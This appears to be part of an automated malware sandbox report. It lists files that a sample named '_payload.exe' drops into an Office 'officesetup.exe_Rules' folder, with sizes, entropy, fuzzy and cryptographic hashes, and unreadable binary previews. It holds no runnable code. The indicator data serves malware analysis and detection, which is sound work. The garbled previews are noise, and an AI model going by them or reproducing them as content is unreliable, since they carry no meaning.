                                                                                                                                                                      Preview:.<?..........-Ba......55..WZ....9.....v.J.hw..#uOl..w..z.]!..!.Nz...G...*.f*B...E`..F..~..3......\....k4.z..-..r......B....v.....^..{...;...gaY9.\..Z .......M..*.}`..ld.t..N]....:.y.EPT..).Y..X.....Jz.$..=.UBgL$.rX...k2.X.....v.x..?/.L}>..o........(@.E.T...(.x..1#..y#....M.s.!>.{....F...........|.6.%.B.F......(...+.!.MYc..9.2.....e..&&.V.......!lf[.....ITw:....,...%".. .8...v.hI.V....r.|....V"FOW,K,e.4.#1P..~`ay..rJ.5..../J.X.#....d........."/R.........#N6..S..'..!1.?.j.-lR.>.e'b.9..R..{...E.06R.v...........J.].H.>..{..."....Q....V...'.>]....RP...............z......zh$...@......YX......t.O...b.@(lWyfdr...8..6#u..c.Rp.<.p.I=E..".^@..&.U.v..U..H........@].0.v.....s.j_..Z..}U)..nk.uV..-p.......)H.l..*... ..;$..H)..f.$..i.o.....[]*........')lp....N[...kZHy..W@.!....8........v&8....._N.xM...!....>./...c..9l..U<n...[.%..x....(.r.H...d.Q#Z.N.RG.k.q....P.JTs!.V.......&u..nm.\.h>..{4).8..!...$x#B6..A.5.F9RL.|i...([...;.o...$RbB.......R....~...g.Y

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703051v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1762
                                                                                                                                                                      Entropy (8bit):7.88388329309058
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:P1FXk0jgOGl5OPNcCJ1lsemG/uujLrWVuD:P1Fyl5OP3MemG/p/WVW
                                                                                                                                                                      MD5:463A616784B616E69F8B68AFFF1E742A
                                                                                                                                                                      SHA1:2D4C9B46AD76D2155E7CD89108DDB71E285CBCB2
                                                                                                                                                                      SHA-256:FB2F3D1DB26D4605BE407BDDC203A3ABF2C92736ACA2D076DDD9FC0839A4ACA1
                                                                                                                                                                      SHA-512:E78403974FE75D7CE39036E08574516B6812E819C2068E672D372735F05CA224D32C52D593EF68797508572B80CD3F2BD2189621E502557E5E77103B483BA406
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?}Wd;.8c.....H.XJ3..hX.......|Tr.]....n"-..\!./-J.8.=)...&..K....>rCE|....&.xA.m......R.L'}.x...!...$....y..7.'..{.0.|W.....^......7"..K..}.4yp.].....].?..`U...|_..~.o.1....$..G>"y.....y..#.x.P...;.i)...@b#...a....}o..zN.'..w.u...;...xqqO.H..."..].h.v9............!1.E..8.....z<...W.E.m...Fb..L...._..M..k.....}....?.@@h.'..%....xp!/%|.&b.,?..q.s...S%6..N...<}tv^.vPA.G..w..Z.G.f.J.K@....|.R....\.u...$..ee.u...h2../..E.....X....z....7.b...E..h.z..3...=..E?.18...^..:..3....n.j.{...v._...V.........=........H...M.L.x.&...=I.Q.<.]!.......:..q.*0..*?...,..F......M......6y-C...K..S$.'........Z......SLT..&Y...?..mM..(.T|f.{.#...s%..P..Xywl...8.G.V}........5k.....i....R..=4,5.....i;..H...+.J#.)....t.....=..&...=.......eyAg<]r..H.2.4..J..."..@.q..0..(.|..C.&...J......m.1fK...k..#S.......Z0..W..k.]KK.Q.l..i...b.P...o.>.m.Z..d.c-..K..<.........Q....?..\...iw.8LHa..z....cj./Q;..._......A.I..".:....<.?....B...h.=.de._.nx.L....D.7.'.\2]..q...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703100v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1690
                                                                                                                                                                      Entropy (8bit):7.882884841204346
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:b650uN9wUUq6drp1cDNPmo/tWkZhFpqLPbG0ruHuD:bSB9S3cDNjpZhkvru2
                                                                                                                                                                      MD5:85CFF9AFD16ABB7E7DF51E465345555D
                                                                                                                                                                      SHA1:516D67A011C9E1AF961FD2CCF18A9F2551A4B3A6
                                                                                                                                                                      SHA-256:3F718F719B2B0444BAE60F7FC509CFF52DB35B8CBCD62D2441D19D8AD57AC71F
                                                                                                                                                                      SHA-512:00BFDCB643DB37A4D3B0FBF5B38BE8E8BFF2B8F4A11F7582594BB4329E4FBB5317B7A15BF3394A390FE69929E1DDD49ECAA132F088A2FC355923DBA78095B8C1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.v....s.........%.~.1.[F..."zV.`W....V.uh...5.14..Z...2../....U..GT...x.`...=.2.....H.....m.Z.P...4......t..:...gu[.z.y&K!..P..9g..V.%.S.....1.S.B...r..NX...9.7..]..3).....Q.Hd...5"..U.%.F..m.q...o&..)..{....{M....#?.9...E....r.0]u..80.,.). .=.q.&E4...!...I.\ ...Eu..m..|..W...6.....j.$C....7..g.o.Q...pq..`b....38z\...=.r.6....#.Q.b,...k...WS.?@.c.9....}y........=&>.~.R...O...k.T....-...^(q........[m.V..f*../.J..M&ztB........t.z.|....-............&...p.>Uk.=9`U/..i...@...@e]..........%..$..W...C.......r...Q.....o....z.Q&.....I..(...r..".....L......GJ....F.[.[~..+.".....Z..`.]e..qc^.",\n.T-...R.L.I._...%...A(........ij.5..N..H.F.."fn..............0%]{<..$.T.iZk0c .@..V...<....A.Z........{..].\.#.d.QL....%G.PP....y.E..9..$........g.0nqV!.. ...<~GPCn.p..*}.3..."...z...h...=....u...........S..p..H.[...>.B..2jQ... x^tALD.5.....@x.g..U.F....G#u.'..!)...3.(l...-R.S\..Zl...R.\...\..=.b|...].].....9...Qd..u.zb.......u....uE.%T.fK.\..:..m.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703101v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1727
                                                                                                                                                                      Entropy (8bit):7.883902663633877
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:WFRHcEaG/fSNTeAMjdSNvGiQaflLn1Zp5JgCaokD:WFRHTaG3SNcJuAafppW
                                                                                                                                                                      MD5:46BC09660BCD7AE61906EC5A59CA5A11
                                                                                                                                                                      SHA1:61B0C5EAC4402EAB867790994DB6D714F522E4DE
                                                                                                                                                                      SHA-256:A05BBC305CD0DDB93709A58C884B58AAB046121BE0626A8116A360AB34E2CC55
                                                                                                                                                                      SHA-512:DDEB1F42E8F505D159609702C8BFBA51F344115899600408D4F072E46EE0D143A9AF3B424D46CC35AB91476D5913FD9175E9979F08BD2A54A041C77198CEB468
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.....5.'s.?.4An...V?U..I].4.8..dF.J!.3....B.X0.R).-b.."O.fQ.A..e.x.y...3....* ....<l.;.N{<_. >11...D.W-"..BI..9Hd&......!A.+Qf.....N`..D.O.@..y....].Q..=0Y.N.......y..n:.....I..... z.............h.L.[.xQhro.q..)b$.p........H.....q.M..U.,...,)@...z......DJU...&.8>......|...=1..pS..>.{. .36(J3....i..U@My_. .D...lqZL..g4.;...o.....k2~.$.i5...x..2`:s.....dm.8.....3fC.wu0.J*..J....6Ws#u.....*....2D...Ai....'.B..y&H.F. .zu.44..w..#W%{..y.px.....R>....nnb..t....'...Z..;.g.T..J'&..$..q.JW....s..MRy?......X.-.bl.l-....(...Qv...............n.B...Y...C..+..I..'..Vl....;b.A.P.V.$%7....s.t...O..'..JJ<..>..z%.{...3..{ .ES..F.2...K..va._!.(.y...._..M.G...vk..B..]..9.r..N,.F2.U......y....a.Yp..I...#Q^B.....^....h.&u.....C3.[=..a.C.p...:@...r{..9...............0....q..\w'{d..h(..>..2'_....$@.W...8=...|b.k.Gga.o....0..{X........P5dpD|2.......fgp.......K.:.........A.df..N.89.z.0...~...*6n.}...{$...._.CE.`..$.P.^[..zy....Upkn ..l$[J...c...~.k....k.7.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703150v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1708
                                                                                                                                                                      Entropy (8bit):7.877874736674966
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:khiZ6M30r8OAal2HZIlxoLyhWWSV9tqWfztD:giZlcxl2HZI30yhW9V3fzV
                                                                                                                                                                      MD5:5C634A5F7A227733E5200ACCB40B1073
                                                                                                                                                                      SHA1:424595132B8BF6072000892A29C3AAF013FF6447
                                                                                                                                                                      SHA-256:A24F712CC2F4CAA25A6A4520A283F6AE9CF65DDF7BCD64898715F58231520A4A
                                                                                                                                                                      SHA-512:752798B3AE43F5CFEFA400C3334CFD8B38D6E1F68075CF4E5A27239A8046BB41AC69AD3DA6EA9F2460F984BDAB5A5B8996B6C980934EA8EA2DEA5C3DBAFFD172
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?....X.v./-}../.T..<.T...K....5c.R......O.B_Q..GF......_.#X{.>.NT.V9..a..M....`..jJ%K../9.@&R....3....f._..d.w.......K..<..%)6..x.m.Pe.....W..HY.K...._..E....?.;./.....;.q.!...H.......q"|..z9.Z..?..-....Q.t......Qq..c......D@)..O'x........ .......3..H..Q.-..<.;..@]@|.;..z. ...#]..].$....t.p....>.{.#..2k...>Nn.W?.5..Bn..Lc.Z.9.uQ.;..\(w/l...or....*-3..~..z.F..R.;...c.g.m0......k..nN.@..DD..^g(`.(.+...:.Yg.......;I.<.g...X:.W[..K<.,-....i.....H=.Sv...oP..K....H.3Rs...{.z.\.Z.h.H....(.}.Cx$>2...:..>..G......qY....b...{...d$....d.6.P.y"%.dB.\.P.f{.....R.@..f^......1..s...U.r.F.N..h.yF..[...)...f..._......6....j.q.<......o..c....S..s.s.v`.. ..|..V]O &...B.@..H..mA...._...<.x.....y.|........C..{.C.Z...55...\.....$..0..q.R.<..DM.....9.|U...z(t..$..R....$F.'..0Z..f/.m..0..bu-...@...R.1..!.4......4.*.z..;"y*....].<.P.B.\6...8Jn1.S..u...........>.a...<.../...dg..g+..ogl..#~G.^..:cU...*..Y..p...0...F%.....N\U.>....w..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703151v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1745
                                                                                                                                                                      Entropy (8bit):7.882274329281205
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:pZ1Ys5FtoOinh1ytnWGgjemZifGt1OXYDhA8cphIBUerhD:pbJ5Ft8nitnW/wycYF96IBzrJ
                                                                                                                                                                      MD5:4B3D96DDC10CE9EFEA30B00BAEC4F248
                                                                                                                                                                      SHA1:3A1C986905AA80C3426DEBD84DBC9404DDFFA02F
                                                                                                                                                                      SHA-256:0FDAB3087262DBCC0DD65C5DEA0067FEFC44018E6A4CECD793E9E6CBAF0BCEE2
                                                                                                                                                                      SHA-512:062855E015944ABEA78D5DE965EEF1A7B5175A5A5942FF860BA79F87F80FA511BFECDBBF5D867556FD6D15A6A351C39C49F9C2C1A265403130B11BC6FF3D48D2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.5...j......}.?6_S?....t8'...Z..2.'A.V....y...I..\.B.&...6q1...3...I..JJ.......ib/..B.m.g....(z..&$..1........uf..".{.X.F.o .@.I.0.|l....C...3m..O...!}.]....0.>..x"....i..+.....n.B......0.$...Sp... ..@.V-...}...v?.:l.Lc....4..C.~.$.y..n.B......n.6.n...-...B..X......TmD...l.}.H....0.......3.h......!iL....s...W."..~D^..;/.`.......G.....=..OG.1.a....Y...f..@...W..._{...HI.=.$....=....a...|%.|.kr....k.&..b......r.L...EM....~?..g..(.W.. .......-.)..VR.WE.r ...?..;..X..hc...?.Ym.'....8.N+0G.;...}.w.BF8.;.$..u..3ee..F..ez.S.....{.pBM..#&..&...t}...@Y.c"..(.0G....._.2?8..._$ok ....~...wW....e.le...P.nx$lHJ|.V...x.x..c.Q.....Q.b...?0..BT.u..E...2...._.\x.[....+..[.o..,2..~Juj...6B'....Np.;. ....h'.f....Y.v.:.pm..e..lG,....'..g.i.Qg......z.e../n...0..(i...X.1Q...E..S.n......3..p.'......b......".'%'.........r....a....^M@..6.`...-7..P.N.zm.&.'...7G.....p]....e%Us....p.&d.J.>....gw1....!.s.....^.e.s...5..~(*Ze..v.....Z......v.Md9.....g.;.`A

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703200v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1696
                                                                                                                                                                      Entropy (8bit):7.89326239394883
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:vYi+R+hFw5QcQIOfbmjAoWrwQTlJcqVhydD:gFYE52IyoowQTIqVhyl
                                                                                                                                                                      MD5:5B4C29914AE32A4F0741AC60AB6BEF8D
                                                                                                                                                                      SHA1:30D7253F9B3FB4F6EF8978FFBAF57BD793F53C5C
                                                                                                                                                                      SHA-256:89C6A3ECD20A51C5709821DA22A95189B40246D269EC27EDDB91882527F748B4
                                                                                                                                                                      SHA-512:9E535E7F0A0B1ED92EA810DFA599A39B522FD3B565CA8C48BAE4E2CFFE75ECE9B8A7EDFBBE451B9447EA5525CFE2ED2C89BE1178B9199CD4618DC31681FED296
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?....Ju\Zn....x.^n...E.j...~,8s.7..ab.Y.....%....e....-.Y..@B..*..8r+O....nn...y...jv.c..r...ab......c...E..xr...L).^)k.&| .bi.De...Jk4H |....n...Wf(}.g?....V.=...^...*.......P..(L.a...n.$2......L...D..5..G....]..5...G.8....`.J9M!..Btj...4XB>>tR...etC..'V[.{.O...4.:UJOad.N)t..^.>g.67......7.....^.#.=T.<.7;q...=...N./..m.qC@|.o.>.f,X.#S.#~..........Y........W:.*.u.(...S2..l...a.....~5Q..S$.fv.R.c......mn...t.v&.79..v{..9>.....i..?...||^..gi.QR..Uz!.\91VCA.!....".M.. .w`.5m.o...0q.c....v]/.W...xo.7..0n.U,.P.!^ ..m.Y......I.k....zd.~.Z...p.K..pp..-..$D;..U...O.....H.R."#.L@.;K......1.....y........b..*.Q*.x*...d.G..y..$.g2a.Il.p .w_...i......N...)qw...&..Q.Wq..j_.@....b..Nx.]...XB...}.[\..X.!8z(..ue./....'.6.w....UiP.*6K...=0.F]....R........p.8:...=o..1A`.[.#..{.0E.~..'.=..r.....i#..S....@.,a.-..pr"j.Q..[.n../.E..'..jI.T..%L...H.....'.....A...5#....f....'...;n.S...r..)Y..WB.gq9...Xb.K....<..8].H..\.V....\9?bQQ.Rp.aP@x-....m..Jn.....@...<k...s..wo..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703201v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1733
                                                                                                                                                                      Entropy (8bit):7.895324260488232
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:TFF7noNDA+dSHHx/kxOEPe8XLc0KBErbNvjmD:TD7noND3mHx/Wlm4Lc0mEh+
                                                                                                                                                                      MD5:D984F62CC3087F5E6701170C4B8DE5A2
                                                                                                                                                                      SHA1:13F6F5DA73BF345F42C02AF51C160D613622DDC2
                                                                                                                                                                      SHA-256:80A570B00C3425BE10D91A9063A7E37EFB0D1411E0CC012574982103D50B3E60
                                                                                                                                                                      SHA-512:09889CEB6FF9B2F6658615AB62F624047022F66869464DC43F00B51003AA0E16E5C84B9FC67230EB7CE7D7E0E74E4B3D03CE68E948338F31DB4D90CD0606A5B5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.q....=g.n..ea....iHj.....@NV..3....e\.....$#2..sd.)...e.qb...iR.t..B.t.G Oy..Cc....U.Y.SAiy%.8mf....J.Bc.Y..P..@"M1_wi/......G,..5.D.;.i<...^([.. ....[m..e..B7..PQ.70.......e[..o'.j.......9.cM.?.-NU../.y.&..,P..}..n.e$eU.{.....0W......5k94...G....ZB.Y.|K....P.'x..s......."O..w.E..zeko....?1....B..bw.. ...g..Ul1...._..k...d..........I.M~... ..D<).1O.^........x1...h..3._....A..Y.C:..q...X..e.-.L.....N0.Ce..'.|.~...c..R....9.^.t.~...........j....L.M&........._...Y.....bc....tp...%.._L.@..5.G.Z.g..s.Z8...Z..6.D4.Wk..BL..)..v...0.y......@._. ..".....W......&.A(.C...Q.z._....o7...G...d.vVU........ny..-....mk(..w..O?..jun^Q...u.../.tR..r.....@-S......E...R.....;..1......=....K...u..Ur.b^}.7..-..^..N8..4....|..]...cj#I~.L.......6..l.K7...GA...).[J}...8}....o...~b...}=l #.P.....b.u.[.MY.44.*.4.4..):3%.....v...m.{.....r...+.....3q"D.N.Y.|(.}...LX..| .F...3.sV.d..'.G..E.....&t.HT..?....].....x.U.*.f._.P...9].Y..ki........w.W.0..w.Y..K.......S.J.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703250v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1694
                                                                                                                                                                      Entropy (8bit):7.875735039976812
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:C+dMWxArfCBNJr0YYwfaDD8nppeGjJtByND:C6MpaLJr0EyD4ppe0Jt6
                                                                                                                                                                      MD5:C1F36419CED6FF278A2DA78E377DF8E4
                                                                                                                                                                      SHA1:F219D66CA777B4EB9042AA3B8834C06BB8D3D8D7
                                                                                                                                                                      SHA-256:ACB6A76E15657C8C91B6CE78FAEA9807CDD8B6DE1E0CB884221BBD0D07B87664
                                                                                                                                                                      SHA-512:BF597F609AA331580483C8F06EEE54F69BC757B522DA45480629AFAD3B647703D7CEC827293A26B54186CCE2F5F70E96158070B783A5995D61EFC27348159C65
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..G;..B.^&.=..2.W.....u.CQ^..l.....u%b..e3..h....B...S.X.....R].&}.....8..t.......'.N..'..@;...'.....4.7.o.b!.).... R.tf..Pf.:.....ao..d.-.I.yz...[n2..A.....!Lo3..<...1.H..QL.i3....].".s.31.g.fK........).0...F.t.:...T.u..0...+...xM..o....Ox.a[.s.t.E..........V(.2"....z.b....q|[.iZ!...;.-.1....I#:......r..6..9..?......Y./..l.md.. ......*.oC.m4.>[...&..)....Y..>l.........ft....+..T....Oi.....g....'/n...&j.x......-..e7..Z... ..{.....f.L...(.DGS........!.7R...m2gL)DJ.^k.vi.&.......:As..P.q^.h5#....2-..ol>...AB.Ry-.&4...:..C....-.P.,...Cg...<..iV.X.....y.../w`U.j.....UI.yu..U..P;\.....#g&....r<....<......O..m......Mb.02.T.K1..V...Y#...7b....].S.V.c.v1%#..7..........|.e.....v>....b.n>.v...w..4..5...v)d..1.C-w..#..........8..;^.....:M..J7.FI...o..kE.@7..U9..'Lp........8.Wrc..@R..|..HH...F.(X...S.-a...&.j.b.-..g^..%.....}.kT..0.fh..S+..,..T]..5.8...s(x..C....2.+..K.........u...%Vh...[..).&`....>.Ni.2.Mh.^Ss~.<......5..[A..0.......E#..uT..%. 5TN..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703251v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1731
                                                                                                                                                                      Entropy (8bit):7.89402150236389
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:BtwfqrfBSvfa6BemER0k/G1aEvvEpfDMIpbgpP/lPsD:BtwitSqie1RAau6MIxKHe
                                                                                                                                                                      MD5:2C9DF34F1184AD8EE6A2417EC3D54B5D
                                                                                                                                                                      SHA1:47EC31F7CA28F99EE18BBE335061057E0CB3D70A
                                                                                                                                                                      SHA-256:F868827CB8CEA828179411A97BD622A6D55B855FC16A77E8D98CF7991436AF4C
                                                                                                                                                                      SHA-512:F318DF1635CF1C4FC7591231616F117E007337F3D2B96A55E4AC0E8214A4720B2E7F10B5BCA87D69F1943EF5F934CACCA618FBF41E33D7EC84D950DFCFE02004
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?9..i.i...../.....n..'......g....../N.jdu...m.n.Uu.6.x.,.~.k.... g...6....{.&8...Vm.G$.O.2.H8qc>.v./.%....nn..F..JP..D..X?h.'L.ZGy.....t.....r...{)<...iq.....D*...f2.....8.T:_U.?.Ok.q.}z...\.n.W.G...-..5.....|....)." .8#M..?.1.I3.....[.v..../.+....zVXm..Y.s.>M)i....(k..L:......\GxdD..D.B..mB.h.K.7......\...wGj..YH;.g.n.:.m..._H.:...Bj7-...?...!.s#....T.;.:.......BF.\..:U.+..B....Nl[ ....w...._..}.?...'.1!.d..]..o.c`.........T!V2...5./....;.._ .b.Z..5.._&q....k.r.J-.....o..hy.X..Z........4C..[...\..+&...v.....y.*%.+.W..b/.J]...X...y).z.7s.8u.Ix....h..0........"...3..Pg..:?....Kx!.....U..#A....../...z....=.../...j3.#m..eJ.B@Y...y...KV....FTu;C.d..&.3.e.|.*m[..7l1}.~.L.."....)...=...........\U..a*@.l.Ct-.../.2..#...)x}<F.b[1~.....iW./*sL..P.6..=..?..........d.u.........O......ij....w......`v'l...Z.b..y...=.I...R..S^9............p1...SF.......w...+....%?..4k...I...$..'P.j.....,...yj.(`9%.f....q......l...L.*..z.........>1/.C$".ty.@.!.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703300v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1716
                                                                                                                                                                      Entropy (8bit):7.900056801939068
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ijelpbYYgJDfcbdZw22CBzabqi6tbtKCny0+p6/ePvD:pvENYdZX2az2qdbcCnhZmP7
                                                                                                                                                                      MD5:FE002B95D29750BF55009D10FA2C27DC
                                                                                                                                                                      SHA1:2077780CAA8F3945ACD2AEFA143C1A1C3CCBA3C9
                                                                                                                                                                      SHA-256:6C19F8B1DC3072EB10CB4DA321691017CA5CDDB66B4B9EDBD0031B27AEBF8774
                                                                                                                                                                      SHA-512:2BF527BE8C7606E65D27E69C2617763A6DB49E3FA9E46C335D55DB95932EB630C71187C59F81DD676E07C008DBF2714CFBC18FF40EE377F1DC31F18E8EDF4397
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?...*..D.(..D^G.?..=....\....L.w..b...\Gc...X..F0...g.s&..&.@.v..^... ?ni.....r.6;.?.uh.E.......POo-..H.....L.X.. ...o.....zeySw .].#.[6k.K.t...w..q*...P.S..4.+.ZFs.].QRk......8.H.-.k.X|~..15..}W[.~...y.N&..12HQ~|..1@.?.. \f........%b....rV#.E.*.kh)..z..>2.....QA.^.........N..uKl].}..gp..}+Q[.f...'D..~...........t@d.d%}.;G..P.}u!P...H......5A...W.0.H..3....Sj.R...&&...Q.!.,XN..D{X...%....].<.d.Qi|..i../.V^....,....'..8..C.2.=.....%.....=......C......8W.H..o.SZ'.g.....e.5..fv.|3F...I...&....)^?..ip_...]...;%.+..'.P+...'..Lm.B.dr...^.#z...a..y}p4=`....n.bhb...%..Z..|..:...i....#...GO>U....._*..'.r."N..e,`..5..\K.........x...qTe.h..k.e..u.6..[Q...D..\.D...j .F.D3.......3.h...Z...=..dl}QR.'.......c......*..{`.R...F...Nm.....>Y.!...?.^."NH..n..u_.mG%p........tWz..W&..[2EI............^.....V.D.1V.4..!Zjr............9....6.J.......V....4...rk...Z..Z.)..q.b..j.8~&...2A..X.~9I.4..0x.M.i.Y.+..a@.,o...a..n.....I.....2.\.",c*....`Y.. ...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703301v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1753
                                                                                                                                                                      Entropy (8bit):7.894084447300126
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:59SX3XEBtOLy4kBjpPBYAexDZBHlEWufuVECR4ZxD:5AXFL4xuOfuV9Rc
                                                                                                                                                                      MD5:DFC7E79025540379A8CF0176CD2A0836
                                                                                                                                                                      SHA1:A5E8137956433C138B01F000F8079E5D46C68259
                                                                                                                                                                      SHA-256:DAB1C5B21614E52DAB95F8E7135A08D80D0AB6528C9A365DE7BE4D34EEE35607
                                                                                                                                                                      SHA-512:C8EF78D22C09277042BAF7375AF42087DDED26612AA8DC86F16693B230C9E7CD180D41C3A179F49AFBC1B4C22A7A7262FC1B1F9E7715C6DA9ABCE4F4BC363F53
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?R(.bg#..].U.9...G...h...z2Yn......DG....9.0...X.0.....x?To.G.$ip,T..=....<.,`.q..@da.#Q... . ie.?>Nc!...V..d%pG..=..iQ....W.].bJF.&.N.@..bi.....u...Eu.q.?96R.e.|.9...!y.O..........}..rbV......rFfe..o...1\m.K.4K"U....O..#."x.`..`....Sg..+...>..^.d......x..89w..;x..@........18...k..rU..............1....4d.P.r..n...."A......3W ..hiC.V!..h...:.X...ot4u..2.....^....v.h..s...HiF..D.@G...=K^.$......7.....\..x..|.,mr.....)...i.....02>....]....w..U.N.]JN...S.Kx.*....N.....Vo.=!...._....8G2..L.._..:v.9. ..>f`...,. .#.5os...E..Q.4Y.Y..d.FC.s^.N..8.... ..cU......<l.F....(s.V.D......d..W..C..3.s...\r..\X_.k....9.!.!......[O2.3.h.).....V..... ."M=*..... .>..-(.......W...../..G.../..Z.6W.t.wz..%..........Y.d'..]S.?.].Q*._!o.?....U".......n...w`..}..~.......:eq.b*.k/r{d.....8" {$..N.J......>..*.o.@.n...T.......z...s..ypu8.H.e....l.!.<..D...=..Y.q..+..!h.1.,..+..`...?.....m.7i.t..$.YJ{>.~Y.l..7....r5..vq.....z..L....."Yc`....E.P.z.T&....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703350v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1700
                                                                                                                                                                      Entropy (8bit):7.88047404231874
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:3DqqlWEMkUNWNovJcUXWqGvk5vqt9zaQnctxlnccIojM14ABivuo/0M0pdKIjzZs:TqqlWHZNWnvkAnYlTq4ABiWYBZWZwD
                                                                                                                                                                      MD5:F0DEDE778BFB6A54764A6B51AA75C219
                                                                                                                                                                      SHA1:9ED741D97A7F51B37260278E4A23F17E83D5D56F
                                                                                                                                                                      SHA-256:931CCA5BB82787EE7C34BBE987E087F4F09A56F38DDB5A653A28372167EDA23A
                                                                                                                                                                      SHA-512:1434EB4EF26DE609219A89B16A11FB580BD704D92A7396C03BB51377BA26BD210FFA836818E8301D60FB5105D35367FA6F16A686433ED49EADC53707CA083C3C
                                                                                                                                                                      Malicious:false
